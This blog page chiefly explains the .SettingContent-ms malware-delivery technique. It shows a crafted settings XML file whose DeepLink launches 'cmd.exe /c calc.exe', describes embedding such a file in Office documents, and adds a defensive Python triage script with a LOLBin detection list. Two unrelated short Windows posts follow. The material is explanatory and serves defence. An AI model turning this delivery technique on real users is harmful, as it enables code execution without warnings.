Friday, July 6, 2018

New macro-less technique to distribute malware using .SettingContent-ms

There is a new infection vector that can be tapped into, one that circumvents the current protection settings and even Microsoft's new Attack Surface Reduction (ASR) technology.

.SettingContent-ms is a file type introduced in Windows 10 that lets a user create shortcuts to the various Windows 10 settings pages. These files are plain XML and contain the paths to the settings binaries that each shortcut opens.

A modified ControlPanel.settingcontent-ms file that runs calc.exe

<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
 <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
  <ApplicationInformation>
   <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
   <!-- DeepLink is the element being abused: it normally holds the path of a settings binary, here a shell command -->
   <DeepLink>cmd.exe /c calc.exe</DeepLink>
   <Icon>%windir%\system32\calc.exe</Icon>
  </ApplicationInformation>
  <SettingIdentity>
   <PageID></PageID>
   <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
  </SettingIdentity>
  <SettingInformation>
   <Description>@shell32.dll,-4161</Description>
   <Keywords>@shell32.dll,-4161</Keywords>
  </SettingInformation>
 </SearchableContent>
</PCSettings>

This feature can be abused because one of its elements, DeepLink, accepts any binary together with its parameters and executes it when the file is opened. All an attacker needs to do is replace the settings path with their own command, typically launched through PowerShell.exe or Cmd.exe, as in most attacks of this kind.
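The following is an added example of my own, not code from the Malwarebytes or SpecterOps write-ups: a small Python triage script that parses a .SettingContent-ms file, pulls out every DeepLink value, and classifies it as malicious (it spawns a command interpreter or LOLBin), benign (it points at control.exe or an ms-settings: URI, as a genuine shortcut does) or in need of review. The LOLBin list and the allow-list of legitimate targets are assumptions chosen for illustration; the two embedded sample files are constructed inline (the calc.exe file shown above and a stock-looking ControlPanel shortcut).

```python
"""Triage .SettingContent-ms files by what their DeepLink launches.

Added example, not code from the Malwarebytes or SpecterOps write-ups.
The LOLBin list and the allow-list below are assumptions for illustration.
"""
import re
import xml.etree.ElementTree as ET

# Command interpreters and living-off-the-land binaries an attacker would put
# in DeepLink. Matched as a bare name so "powershell -nop" is caught as well
# as "powershell.exe". (Assumed list; extend it for your environment.)
LOLBIN_RE = re.compile(
    r"(?<![\w.])(cmd|powershell|pwsh|mshta|wscript|cscript|rundll32|regsvr32|"
    r"certutil|bitsadmin|msiexec)(\.exe)?(?![\w.])",
    re.IGNORECASE,
)

# Argument fragments that only make sense when spawning a command: cmd's /c
# and /k switches, PowerShell's -enc/-e, shell operators and download URLs.
SUSPICIOUS_ARGS = (" /c ", " /k ", " -enc", " -e ", "&", "|", ">", "http://", "https://")

# What a genuine settings shortcut points at: control.exe with no arguments
# (as in the stock ControlPanel.settingcontent-ms) or an ms-settings: URI.
# Assumption: verify against %windir%\ImmersiveControlPanel\settings on a
# known-good host before relying on it.
BENIGN_RE = re.compile(r"^(%windir%\\system32\\control\.exe|ms-settings:[\w-]*)$", re.IGNORECASE)

# Constructed samples: the calc.exe file from the post, and a benign shortcut.
SAMPLE_MALICIOUS = r"""<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
 <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
  <ApplicationInformation>
   <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
   <DeepLink>cmd.exe /c calc.exe</DeepLink>
   <Icon>%windir%\system32\calc.exe</Icon>
  </ApplicationInformation>
  <SettingIdentity>
   <PageID></PageID>
   <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
  </SettingIdentity>
 </SearchableContent>
</PCSettings>"""

SAMPLE_BENIGN = SAMPLE_MALICIOUS.replace("cmd.exe /c calc.exe", r"%windir%\system32\control.exe")


def deeplinks(xml_text):
    """Return every <DeepLink> value in the file.

    The element normally lives in the Microsoft SettingContent namespace, but a
    crafted file may drop the xmlns, so match on the local tag name only.
    """
    data = xml_text if isinstance(xml_text, bytes) else xml_text.encode("utf-8")
    root = ET.fromstring(data)
    found = []
    for el in root.iter():
        local = el.tag.rsplit("}", 1)[-1]  # strip the "{namespace}" prefix
        if local == "DeepLink" and el.text and el.text.strip():
            found.append(el.text.strip())
    return found


def classify(deeplink):
    """Verdict for one DeepLink value: 'malicious', 'benign' or 'review'."""
    padded = f" {deeplink.lower()} "  # so " /c " also matches at either end
    if LOLBIN_RE.search(deeplink) or any(a in padded for a in SUSPICIOUS_ARGS):
        return "malicious"
    if BENIGN_RE.match(deeplink.strip()):
        return "benign"
    return "review"  # some other path: neither known-bad nor known-good


def triage(xml_text):
    """Worst verdict across all DeepLinks in one file.

    Unparseable files and files with no DeepLink at all are unusual for this
    format, so they are sent to review rather than silently passed.
    """
    try:
        verdicts = {classify(d) for d in deeplinks(xml_text)}
    except ET.ParseError:
        return "review"
    for v in ("malicious", "review", "benign"):
        if v in verdicts:
            return v
    return "review"


if __name__ == "__main__":
    for name, sample in (("calc.exe file", SAMPLE_MALICIOUS), ("stock shortcut", SAMPLE_BENIGN)):
        print(f"{name}: {deeplinks(sample)} -> {triage(sample)}")
```

To run this over a mailbox or file share, feed each file's bytes to triage(); anything that comes back "malicious" or "review" is worth a look, and the DeepLink string itself is the indicator to pivot on.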

By embedding a specially crafted settings file in an Office document as an OLE object, an attacker can trick a user into running malicious code without any further warning or notification.

An embedded OLE .settingcontent-ms object; when clicked, it could trick the user into opening the content

How to Prevent these Attacks

1) Use my simple hack to force PowerShell to show a UAC pop-up, allowing you to deny script launches. Note that this only helps when the DeepLink goes through PowerShell; the calc.exe example above uses cmd.exe and would not trigger it.
2) Read the SpecterOps write-up (https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39) and add the file type to AVP.

Sources: 
1. https://blog.malwarebytes.com/threat-analysis/2018/07/new-macro-less-technique-used-distribute-malware/
2. https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39



Sunday, July 1, 2018

Microsoft Most Valuable Professional (MVP) Metro Tile Creator 2018

In honor of winning the MVP award for 2018, my 5th year in a row, here's a freebie for fellow MVPs!

I created a PowerShell script that creates an MVP Metro Tile linking to your choice of the following:

  1. Microsoft MVP Award site (https://mvp.microsoft.com/)
  2. Yammer (https://www.yammer.com/microsoftcommunityinfluencers/)
  3. Enter your own blog URL where your MVP Award is displaying
Once you fill out the form below and your enrollment is confirmed, I will send you the download.

Win10 MVP Tile PowerShell Download: MVPMetroTileWin10.zip

Install

Read the contents of the .ps1 file before running it.


MVP Download Script Request Form for Microsoft MVPs only


Please send your MVP ID so you can be validated. Only MVPs are allowed this script.



Saturday, June 30, 2018

Giving a presentation? Use Windows Presentation mode in Windows 10

How to use Windows Presentation mode in Windows 10

Ever need to keep your computer from going to sleep while you give a presentation? This built-in Windows tool is for you.

While Windows Presentation mode is enabled it does the following:

  • prevents the laptop from going to sleep
  • turns off system notifications
  • prevents the screen saver from appearing
  • shows a background image of your choice during the presentation

Press Win+R and type presentationsettings.exe

Or you can use my handy presentation shortcut tool and get this in one click.

Background images come from %HOMEDRIVE%%HOMEPATH%\Pictures and from the Windows theme images located under
C:\Windows\Web\...